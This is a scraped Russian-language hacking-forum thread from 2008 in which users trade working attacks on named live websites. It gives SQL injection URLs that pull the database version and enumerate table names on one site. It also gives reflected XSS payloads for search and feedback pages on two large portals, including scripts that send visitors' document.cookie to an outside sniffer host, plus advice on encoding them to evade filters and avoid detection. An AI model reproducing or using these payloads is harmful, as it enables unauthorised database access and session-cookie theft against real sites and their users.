21.01.2008, 03:14
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
незнаю, пробую на phpmyadmin, null подставляю сам просто для примера, пробую на реально существующей таблице, в которой есть значение null, concat выдает null, хм вот сейчас посмотрел mysql.user поле password у пользователя root, пустое, но не null, при этом concat действительно работает как говорит Spyder, а есть еще одна табличка там конкретно прописано, что значение поля username null, при выборке из этой таблички и этого поля concat выдает null, а concat_ws игнорирует, так как говорил Piflit
Скорее всего это связано с типами полей, хотя хз
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 21.01.2008 в 03:36..
|
|
|
21.01.2008, 11:55
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
2PunkAss извини не было времени посмотреть, но вобщем то вот как твои проблеммы решаются:
Код:
http://cleverclub.nashe.ru/rating_d.asp?sender=1'/**/or/**/cast(@@version/**/as/**/int)='1
__________________
Карфаген должен быть разрушен...
|
|
|
|
21.01.2008, 17:49
|
|
Новичок
Регистрация: 19.01.2008
Сообщений: 9
С нами:
9636659
Репутация:
5
|
|
Сообщение от Scipio
2PunkAss извини не было времени посмотреть, но вобщем то вот как твои проблеммы решаются:
Код:
http://cleverclub.nashe.ru/rating_d.asp?sender=1'/**/or/**/cast(@@version/**/as/**/int)='1
отлично, спс  а можно этот запрос составить так, чтобы узнать какие ещё есть таблицы, а то тут только селект по одной таблице получается...
|
|
|
|
21.01.2008, 23:12
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от PunkAss
отлично, спс а можно этот запрос составить так, чтобы узнать какие ещё есть таблицы, а то тут только селект по одной таблице получается... вот смотри:
Код:
http://cleverclub.nashe.ru/rating_d.asp?sender=1'/**/or/**/cast((SELECT/**/TOP/**/1/**/table_name/**/From/**/information_schema.tables/**/where/**/table_name/**/not/**/in/**/('Rating1','HelpMessage'))/**/as/**/int)='1
в скобки, которые после not in подставляй очередное полученное имя таблицы и таким образом перебирай имена всех таблиц, а вобще почитай вот эту статью: Провидение Иньекций в MSSQL сервер от Microsoft
__________________
Карфаген должен быть разрушен...
|
|
|
|
22.01.2008, 00:30
|
|
Новичок
Регистрация: 19.01.2008
Сообщений: 9
С нами:
9636659
Репутация:
5
|
|
Сообщение от Scipio
текст
можно было просто тыкнуть в статью, я её не читал  пасиба, вопрос закрыт.
|
|
|
|
21.01.2008, 14:56
|
|
Новичок
Регистрация: 19.01.2008
Сообщений: 19
С нами:
9636717
Репутация:
11
|
|
уязвимость http://images.yandex.ru/
поиск ввожу </script><script>alert(document.cookie)</script> и появляется алерт пытаюсь сделать скрипт типа <script>img = new Image(); img.src = "http://s.netsec.ru/mda.gif?"+document.cookie;</script> тогда ничего не происходит он просто пытается это найти. как правильно использовать данную ксс?
----------------------------------------
на рамблере
ксс http://www.rambler.ru/db/support/feedback.shtml?name="<script >alert()</script>выводит алерт
пытался сделать скрипт типа <script img src="http://s.netsec.ru/mda.gif"> но мне на сниффер приходило только
Time: 20.01 -10.35.48
IP: 80.64.91.1
Host: http://www.rambler.ru/db/support/feedback.shtml?name="<script src="http://s.netsec.ru/frigid20.gif?" document.cookie;></script>
Browser: Mozilla/5.0
как правильно использовать данный ксс?
|
|
|
|
21.01.2008, 15:20
|
|
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами:
10447337
Репутация:
807
|
|
1) яндекс
там фильтруются ; ? " + поэтому твой скрипт и не работает.
2) рамблер
фильтруется +
необходимо использовать кодирование.
|
|
|
|
21.01.2008, 15:26
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
С нами:
10021597
Репутация:
905
|
|
У меня в опере сработало вот так
Код:
http://www.rambler.ru/db/support/feedback.shtml?name=</td></tr></table><script>alert(99)</script>
|
|
|
|
21.01.2008, 15:37
|
|
Новичок
Регистрация: 19.01.2008
Сообщений: 19
С нами:
9636717
Репутация:
11
|
|
Сообщение от krypt3r
У меня в опере сработало вот так
Код:
http://www.rambler.ru/db/support/feedback.shtml?name=</td></tr></table><script>alert(99)</script>
под "сработало" ты имееш ввиду то что куки на сниффер пришли?
|
|
|
|
21.01.2008, 15:49
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
С нами:
10021597
Репутация:
905
|
|
Нет, у меня под рукой нету снифера, так бы проверил. Закодируй + на %2b и в скрипте заюзай
Код:
location.href='http://путь_до_снифера.gif?'%2bdocument.cookie
А еще лучше все закодируй, чтоб палева не было =) |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
